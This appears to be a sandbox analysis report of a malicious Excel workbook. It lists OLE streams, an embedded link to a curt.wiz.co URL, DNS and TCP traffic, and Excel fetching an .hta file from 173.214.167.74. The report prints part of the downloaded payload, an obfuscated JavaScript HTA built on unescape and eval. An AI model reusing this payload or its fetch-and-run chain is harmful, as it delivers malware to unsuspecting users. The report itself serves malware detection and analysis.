          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:283872
          Entropy:7.743278150467805
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . . . . . . . . \\ . p . . . . B . . . . a . . . . . . . . = . . . . . . . . . . . T h i s W o r k b o o k . . . . . . . . . . . b . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . = . . . . H < l - 9 . . . . . . . X . @ . . . . . . . . . .
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 e1 00 02 00 b0 04 c1 00 02 00 00 00 e2 00 00 00 5c 00 70 00 02 00 00 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
          General
          Stream Path:MBD0191BFB9/\x1CompObj
          CLSID:
          File Type:data
          Stream Size:99
          Entropy:3.631242196770981
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . . . . . ! . . . M i c r o s o f t O f f i c e E x c e l W o r k s h e e t . . . . . E x c e l M L 1 2 . . . . . 9 q . . . . . . . . . . . .
          Data Raw:01 00 fe ff 03 0a 00 00 ff ff ff ff 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 21 00 00 00 4d 69 63 72 6f 73 6f 66 74 20 4f 66 66 69 63 65 20 45 78 63 65 6c 20 57 6f 72 6b 73 68 65 65 74 00 0a 00 00 00 45 78 63 65 6c 4d 4c 31 32 00 00 00 00 00 f4 39 b2 71 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFB9/Package
          CLSID:
          File Type:Microsoft Excel 2007+
          Stream Size:45934
          Entropy:7.5587990853484195
          Base64 Encoded:True
          Data ASCII:P K . . . . . . . . . . ! . . ~ . . . . . . . . . [ C o n t e n t _ T y p e s ] . x m l . ( . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
          Data Raw:50 4b 03 04 14 00 06 00 08 00 00 00 21 00 8c e9 8c 8c 7e 01 00 00 8c 05 00 00 13 00 dc 01 5b 43 6f 6e 74 65 6e 74 5f 54 79 70 65 73 5d 2e 78 6d 6c 20 a2 d8 01 28 a0 00 02 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
          General
          Stream Path:MBD0191BFBA/\x1Ole
          CLSID:
          File Type:data
          Stream Size:744
          Entropy:5.677200951472466
          Base64 Encoded:False
          Data ASCII:. . . . . . . . . . . . . . . . . . ` . . . y . . . K . \\ . . . h . t . t . p . s . : . / . / . c . u . r . t . . . w . i . z . . . c . o . / . f . 0 . O . 8 . J . N . 5 . 2 . 9 . 8 . ? . & . l . e . t . t . e . r . = . m . u . d . d . y . & . g . o . b . b . l . e . r . = . t . i . r . e . s . o . m . e . & . n . e . x . u . s . . . . ( Y ? . p . . { & 4 . v . . . T ` . . . n N z ) . J ^ . . e \\ . a " . g . w b r . . + | t . : . . R ? B . $ L ; : q 2 > 3 v k X . x # D D % 6 r . x L . f 1 H H ~ c O . % . X
          Data Raw:01 00 00 02 bd bc c0 06 96 8f b5 7f 00 00 00 00 00 00 00 00 00 00 00 00 60 01 00 00 e0 c9 ea 79 f9 ba ce 11 8c 82 00 aa 00 4b a9 0b 5c 01 00 00 68 00 74 00 74 00 70 00 73 00 3a 00 2f 00 2f 00 63 00 75 00 72 00 74 00 2e 00 77 00 69 00 7a 00 2e 00 63 00 6f 00 2f 00 66 00 30 00 4f 00 38 00 4a 00 4e 00 35 00 32 00 39 00 38 00 3f 00 26 00 6c 00 65 00 74 00 74 00 65 00 72 00 3d 00 6d 00
          General
          Stream Path:Workbook
          CLSID:
          File Type:Applesoft BASIC program data, first line number 16
          Stream Size:320222
          Entropy:7.998542413720984
          Base64 Encoded:True
          Data ASCII:. . . . . . . . . . . . . . . . . / . 6 . . . . . . . J . . s . h . 1 . @ . . P . M V k . . . F . . . . . . . t . . . \\ . p . . \\ . . V @ ' P . , B . Q . . Y . e . . & . W X , Y ! . s . / y A . . 7 . X % w l = [ ! . . { . . R ; , . . . w P % B . . . D . a . . . W . . . = . . . ; 1 Y . . . . . . 6 ; ^ n K = . . . . . . . . / . . . . . ; . . . . . . . 6 . . . . = . . . _ I l ] . + 2 b . @ . . . . . . . . . " . . . R . . . . k A . . . - . . . . 1 . . . . . l . ^ . N g 9 . 9 k s . 1 T 1 . . . . 6 . . . b .
          Data Raw:09 08 10 00 00 06 05 00 ab 1f cd 07 c1 00 01 00 06 04 00 00 2f 00 36 00 01 00 01 00 01 00 4a 09 fe d5 1e b9 f0 73 14 68 07 31 15 b7 87 8e 40 1e 0c ad 50 d4 eb b5 8a bb 93 4d 56 97 6b 97 d8 16 f4 95 9c 12 86 14 91 8f b0 46 c0 85 99 ef e1 00 02 00 b0 04 c1 00 02 00 8e 74 e2 00 00 00 5c 00 70 00 9e 16 99 b9 ed 5c b8 da 0a dd f3 0b 56 40 27 50 9b 11 2c 42 19 e3 51 0f 00 59 16 65 82 ce
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECT
          CLSID:
          File Type:ASCII text, with CRLF line terminators
          Stream Size:529
          Entropy:5.201958896797205
          Base64 Encoded:True
          Data ASCII:I D = " { 3 C 3 E 0 3 D 8 - 2 5 B 3 - 4 0 8 0 - 9 F 1 4 - E 1 B 0 F 1 D 1 0 F 4 F } " . . D o c u m e n t = T h i s W o r k b o o k / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 1 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 2 / & H 0 0 0 0 0 0 0 0 . . D o c u m e n t = S h e e t 3 / & H 0 0 0 0 0 0 0 0 . . N a m e = " V B A P r o j e c t " . . H e l p C o n t e x t I D = " 0 " . . V e r s i o n C o m p a t i b l e 3 2 = " 3 9 3 2 2 2 0 0 0 " . . C M G = " 9 3 9 1 5 A 0 8 A 8 0 C A 8 0 C A
          Data Raw:49 44 3d 22 7b 33 43 33 45 30 33 44 38 2d 32 35 42 33 2d 34 30 38 30 2d 39 46 31 34 2d 45 31 42 30 46 31 44 31 30 46 34 46 7d 22 0d 0a 44 6f 63 75 6d 65 6e 74 3d 54 68 69 73 57 6f 72 6b 62 6f 6f 6b 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 31 2f 26 48 30 30 30 30 30 30 30 30 0d 0a 44 6f 63 75 6d 65 6e 74 3d 53 68 65 65 74 32 2f 26 48 30 30 30
          General
          Stream Path:_VBA_PROJECT_CUR/PROJECTwm
          CLSID:
          File Type:data
          Stream Size:104
          Entropy:3.0488640812019017
          Base64 Encoded:False
          Data ASCII:T h i s W o r k b o o k . T . h . i . s . W . o . r . k . b . o . o . k . . . S h e e t 1 . S . h . e . e . t . 1 . . . S h e e t 2 . S . h . e . e . t . 2 . . . S h e e t 3 . S . h . e . e . t . 3 . . . . .
          Data Raw:54 68 69 73 57 6f 72 6b 62 6f 6f 6b 00 54 00 68 00 69 00 73 00 57 00 6f 00 72 00 6b 00 62 00 6f 00 6f 00 6b 00 00 00 53 68 65 65 74 31 00 53 00 68 00 65 00 65 00 74 00 31 00 00 00 53 68 65 65 74 32 00 53 00 68 00 65 00 65 00 74 00 32 00 00 00 53 68 65 65 74 33 00 53 00 68 00 65 00 65 00 74 00 33 00 00 00 00 00
          TimestampSource PortDest PortSource IPDest IP
          Dec 18, 2024 15:08:18.165935993 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:18.165994883 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:18.166068077 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:18.167155027 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:18.167171955 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:19.527133942 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:19.527209044 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:19.528707981 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:19.528717995 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:19.530231953 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:19.530291080 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:19.532087088 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:19.532186031 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:19.532241106 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:19.532248974 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:19.532289028 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:19.534122944 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:19.579328060 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:20.317351103 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:20.317413092 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:20.317429066 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:20.317471981 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:20.319046021 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:20.319111109 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:20.319135904 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:20.319192886 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:20.332765102 CET49728443192.168.2.25170.82.173.30
          Dec 18, 2024 15:08:20.332783937 CET44349728170.82.173.30192.168.2.25
          Dec 18, 2024 15:08:20.335360050 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:20.455204964 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:20.455413103 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:20.455589056 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:20.575598955 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544218063 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544244051 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544255972 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544296026 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544306993 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544321060 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.544354916 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.544377089 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.544440985 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544451952 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544466019 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544480085 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544519901 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.544519901 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.544590950 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.544624090 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.664042950 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.664097071 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.664191961 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.664227009 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.668203115 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.668252945 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.668322086 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.668366909 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.736363888 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.736382008 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.736479044 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.736479044 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.738823891 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.738876104 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.738950968 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.738995075 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.747206926 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.747288942 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.747359037 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.755677938 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.755780935 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.755872965 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.764039993 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.764091969 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.764167070 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.766376972 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.772768021 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.772829056 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.772912979 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.774389982 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.780811071 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.780865908 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.780917883 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.780966043 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.789165020 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.789233923 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.789298058 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.789380074 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.797873020 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.797930002 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.798005104 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.798166990 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.806000948 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.806046009 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.806154966 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.806206942 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.807420015 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.807420015 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.813654900 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.813698053 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.813714027 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.813739061 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.821314096 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.821389914 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.821418047 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.821451902 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.856221914 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.856262922 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.929358959 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.929409981 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.929471970 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.929523945 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.931390047 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.931433916 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.932152987 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.932204962 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.932260036 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.932293892 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.936208963 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.936244011 CET4972980192.168.2.25173.214.167.74
          Dec 18, 2024 15:08:21.936290979 CET8049729173.214.167.74192.168.2.25
          Dec 18, 2024 15:08:21.936321020 CET4972980192.168.2.25173.214.167.74
          TimestampSource PortDest PortSource IPDest IP
          Dec 18, 2024 15:08:17.751195908 CET5175253192.168.2.251.1.1.1
          Dec 18, 2024 15:08:18.164083958 CET53517521.1.1.1192.168.2.25
          Dec 18, 2024 15:08:47.058693886 CET5175253192.168.2.251.1.1.1
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Dec 18, 2024 15:08:17.751195908 CET192.168.2.251.1.1.10x828fStandard query (0)curt.wiz.coA (IP address)IN (0x0001)false
          Dec 18, 2024 15:08:47.058693886 CET192.168.2.251.1.1.10xe0daStandard query (0)assets.msn.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Dec 18, 2024 15:08:18.164083958 CET1.1.1.1192.168.2.250x828fNo error (0)curt.wiz.cocurt.wiz.co.cdn.gocache.netCNAME (Canonical name)IN (0x0001)false
          Dec 18, 2024 15:08:18.164083958 CET1.1.1.1192.168.2.250x828fNo error (0)curt.wiz.co.cdn.gocache.net170.82.173.30A (IP address)IN (0x0001)false
          Dec 18, 2024 15:08:18.164083958 CET1.1.1.1192.168.2.250x828fNo error (0)curt.wiz.co.cdn.gocache.net170.82.174.30A (IP address)IN (0x0001)false
          Dec 18, 2024 15:08:35.222524881 CET1.1.1.1192.168.2.250xf0f3No error (0)scdn1cc4b.wpc.9aea3.sigmacdn.netsni1gl.wpc.sigmacdn.netCNAME (Canonical name)IN (0x0001)false
          Dec 18, 2024 15:08:35.222524881 CET1.1.1.1192.168.2.250xf0f3No error (0)sni1gl.wpc.sigmacdn.net152.199.21.175A (IP address)IN (0x0001)false
          Dec 18, 2024 15:08:47.195405960 CET1.1.1.1192.168.2.250xe0daNo error (0)assets.msn.comassets.msn.com.edgekey.netCNAME (Canonical name)IN (0x0001)false
          • curt.wiz.co
          • 173.214.167.74
          Session IDSource IPSource PortDestination IPDestination PortPIDProcess
          0192.168.2.2549729173.214.167.74803420C:\Program Files\Microsoft Office\root\Office16\EXCEL.EXE
          TimestampBytes transferredDirectionData
          Dec 18, 2024 15:08:20.455589056 CET288OUTGET /xampp/dcv/greatindiancompaniesgivenbestgiftforyourhealthgivengoodreturns.hta HTTP/1.1
          Accept: */*
          UA-CPU: AMD64
          Accept-Encoding: gzip, deflate
          User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; Trident/7.0; rv:11.0) like Gecko
          Connection: Keep-Alive
          Host: 173.214.167.74
          Dec 18, 2024 15:08:21.544218063 CET1236INHTTP/1.1 200 OK
          Date: Wed, 18 Dec 2024 14:08:21 GMT
          Server: Apache/2.4.58 (Win64) OpenSSL/3.1.3 PHP/8.2.12
          Last-Modified: Wed, 18 Dec 2024 00:54:55 GMT
          ETag: "24058-62980dcb22508"
          Accept-Ranges: bytes
          Content-Length: 147544
          Keep-Alive: timeout=5, max=100
          Connection: Keep-Alive
          Content-Type: application/hta
          Data Raw: 3c 53 63 72 69 70 74 20 4c 61 6e 67 75 61 67 65 3d 27 4a 61 76 61 73 63 72 69 70 74 27 3e 0d 0a 3c 21 2d 2d 20 48 54 4d 4c 20 45 6e 63 72 79 70 74 69 6f 6e 20 70 72 6f 76 69 64 65 64 20 62 79 20 74 75 66 61 74 2e 63 6f 6d 20 2d 2d 3e 0d 0a 3c 21 2d 2d 0d 0a 64 6f 63 75 6d 65 6e 74 2e 77 72 69 74 65 28 75 6e 65 73 63 61 70 65 28 27 25 33 43 25 36 38 25 37 34 25 36 44 25 36 43 25 33 45 25 30 41 25 33 43 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 32 46 25 36 38 25 36 35 25 36 31 25 36 34 25 33 45 25 30 41 25 33 43 25 36 32 25 36 46 25 36 34 25 37 39 25 33 45 25 30 41 25 30 41 25 33 43 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 30 25 37 34 25 37 39 25 37 30 25 36 35 25 33 44 25 32 32 25 37 34 25 36 35 25 37 38 25 37 34 25 32 46 25 36 41 25 36 31 25 37 36 25 36 31 25 37 33 25 36 33 25 37 32 25 36 39 25 37 30 25 37 34 25 32 32 25 33 45 25 30 41 25 33 43 25 32 31 25 32 44 25 32 44 25 32 30 25 30 41 25 36 35 25 37 36 25 36 31 25 36 43 25 32 38 25 37 35 25 36 45 25 36 [TRUNCATED]
          Data Ascii: <Script Language='Javascript'>... HTML Encryption provided by tufat.com -->...document.write(unescape('%3C%68%74%6D%6C%3E%0A%3C%68%65%61%64%3E%0A%3C%2F%68%65%61%64%3E%0A%3C%62%6F%64%79%3E%0A%0A%3C%73%63%72%69%70%74%20%74%79%70%65%3D%22%74%65%78%74%2F%6A%61%76%61%73%63%72%69%70%74%22%3E%0A%3C%21%2D%2D%20%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%36%25%37%35%25%36%65%25%36%33%25%37%34%25%36%39%25%36%66%25%36%65%25%32%30%25%36%32%25%33%36%25%33%31%25%33%34%25%33%32%25%33%31%25%32%38%25%37%33%25%32%39%25%32%30%25%37%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%32%25%32%30%25%33%64%25%32%30%25%32%32%25%32%32%25%33%62%25%30%61%25%30%39%25%37%36%25%36%31%25%37%32%25%32%30%25%37%34%25%36%64%25%37%30%25%32%30%25%33%64%25%32%30%25%37%33%25%32%65%25%37%33%25%37%30%25%36%63%25%36%39%25%37%34%25%32%38%25%32%32%25%33%32%25%33%33%25%33%33%25%33%34%25%33%30%25%33%38%25%33%31%25%33%
          Dec 18, 2024 15:08:21.544244051 CET224INData Raw: 33 37 25 32 35 25 33 32 25 33 32 25 32 35 25 33 32 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 33 39 25 32 35 25 33 37 25 33 33 25 32 35 25 33 32 25 33 30 25 32 35 25 33 33 25 36 34 25 32 35 25 33 32 25 33
          Data Ascii: 37%25%32%32%25%32%39%25%33%62%25%30%61%25%30%39%25%37%33%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%62%25%33%30%25%35%64%25%32
          Dec 18, 2024 15:08:21.544255972 CET1236INData Raw: 25 33 39 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 30 25 33 39 25 32 35 25 33 36 25 36 32 25 32 35 25 33 32 25 33 30 25 32 35 25 33 33 25 36 34 25 32 35 25 33 32 25 33 30 25 32 35 25 33 37 25 33 35 25 32 35 25 33 36 25
          Data Ascii: %39%25%33%62%25%30%61%25%30%39%25%36%62%25%32%30%25%33%64%25%32%30%25%37%35%25%36%65%25%36%35%25%37%33%25%36%33%25%36%31%25%37%30%25%36%35%25%32%38%25%37%34%25%36%64%25%37%30%25%35%62%25%33%31%25%35%64%25%32%30%25%32%62%25%32%30%25%32%32%25%33
          Dec 18, 2024 15:08:21.544296026 CET224INData Raw: 25 32 35 25 33 36 25 33 31 25 32 35 25 33 37 25 33 32 25 32 35 25 33 34 25 33 33 25 32 35 25 33 36 25 36 36 25 32 35 25 33 36 25 33 34 25 32 35 25 33 36 25 33 35 25 32 35 25 33 34 25 33 31 25 32 35 25 33 37 25 33 34 25 32 35 25 33 32 25 33 38 25
          Data Ascii: %25%36%31%25%37%32%25%34%33%25%36%66%25%36%34%25%36%35%25%34%31%25%37%34%25%32%38%25%36%39%25%32%39%25%32%39%25%32%62%25%33%35%25%32%39%25%33%62%25%30%61%25%30%39%25%37%64%25%30%61%25%30%39%25%37%32%25%36%35%25%37%34%25%37%3
          Dec 18, 2024 15:08:21.544306993 CET1236INData Raw: 35 25 32 35 25 33 37 25 33 32 25 32 35 25 33 36 25 36 35 25 32 35 25 33 32 25 33 30 25 32 35 25 33 37 25 33 32 25 32 35 25 33 33 25 36 32 25 32 35 25 33 30 25 36 31 25 32 35 25 33 37 25 36 34 25 32 35 25 33 30 25 36 31 25 32 37 25 32 39 25 32 39
          Data Ascii: 5%25%37%32%25%36%65%25%32%30%25%37%32%25%33%62%25%30%61%25%37%64%25%30%61%27%29%29%3B%0A%65%76%61%6C%28%75%6E%65%73%63%61%70%65%28%27%25%36%34%25%36%66%25%36%33%25%37%35%25%36%64%25%36%35%25%36%65%25%37%34%25%32%65%25%37%37%25%37%32%25%36%39%2
          Dec 18, 2024 15:08:21.544440985 CET1236INData Raw: 35 25 36 36 25 32 35 25 33 36 25 36 31 25 32 35 25 33 36 25 33 37 25 32 35 25 33 34 25 36 32 25 32 35 25 33 34 25 33 39 25 32 35 25 33 31 25 36 31 25 32 35 25 33 34 25 36 34 25 32 35 25 33 35 25 33 32 25 32 35 25 33 34 25 36 31 25 32 35 25 33 36
          Data Ascii: 5%66%25%36%61%25%36%37%25%34%62%25%34%39%25%31%61%25%34%64%25%35%32%25%34%61%25%36%38%25%33%65%25%31%63%25%34%37%25%34%31%25%37%34%25%34%63%25%32%61%25%37%37%25%33%63%25%34%63%25%33%38%25%34%63%25%36%63%25%36%64%25%34%65%25%31%35%25%33%38%25%3
          Dec 18, 2024 15:08:21.544451952 CET1236INData Raw: 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 32 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 36 33 25 32 35 25 33 30 25 33 35 25 32 35 25 33 30 25 33 33 25 32 35 25 33 30 25 33 37 25 32 35 25 33 30 25 33 34
          Data Ascii: 2%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%35%25%30%63%25%30%32%25%30%35%25%30%63%25%30%35%25%30%33%25%30%37%25%30%34%25%30%32%25%30%35%25%30%36%25%30%32%25%30%3
          Dec 18, 2024 15:08:21.544466019 CET1236INData Raw: 35 25 33 37 25 33 31 25 32 35 25 33 35 25 36 35 25 32 35 25 33 37 25 33 32 25 32 35 25 33 35 25 36 36 25 32 35 25 33 34 25 33 35 25 32 35 25 33 34 25 33 34 25 32 35 25 33 33 25 36 34 25 32 35 25 33 34 25 33 33 25 32 35 25 33 35 25 33 38 25 32 35
          Data Ascii: 5%37%31%25%35%65%25%37%32%25%35%66%25%34%35%25%34%34%25%33%64%25%34%33%25%35%38%25%35%66%25%36%30%25%34%63%25%34%36%25%34%66%25%35%63%25%34%37%25%36%37%25%37%31%25%35%61%25%36%37%25%35%64%25%34%35%25%35%32%25%35%61%25%36%38%25%34%37%25%36%36%2
          Dec 18, 2024 15:08:21.544480085 CET1236INData Raw: 36 25 33 30 25 32 35 25 33 34 25 33 35 25 32 35 25 33 34 25 33 35 25 32 35 25 33 34 25 33 36 25 32 35 25 33 34 25 33 34 25 32 35 25 33 33 25 36 32 25 32 35 25 33 34 25 33 39 25 32 35 25 33 34 25 33 30 25 32 35 25 33 33 25 33 39 25 32 35 25 33 35
          Data Ascii: 6%30%25%34%35%25%34%35%25%34%36%25%34%34%25%33%62%25%34%39%25%34%30%25%33%39%25%35%31%25%34%63%25%35%38%25%36%65%25%36%63%25%36%66%25%37%32%25%33%35%25%34%61%25%36%36%25%34%66%25%35%65%25%34%33%25%37%30%25%36%64%25%36%64%25%33%64%25%33%37%25%3
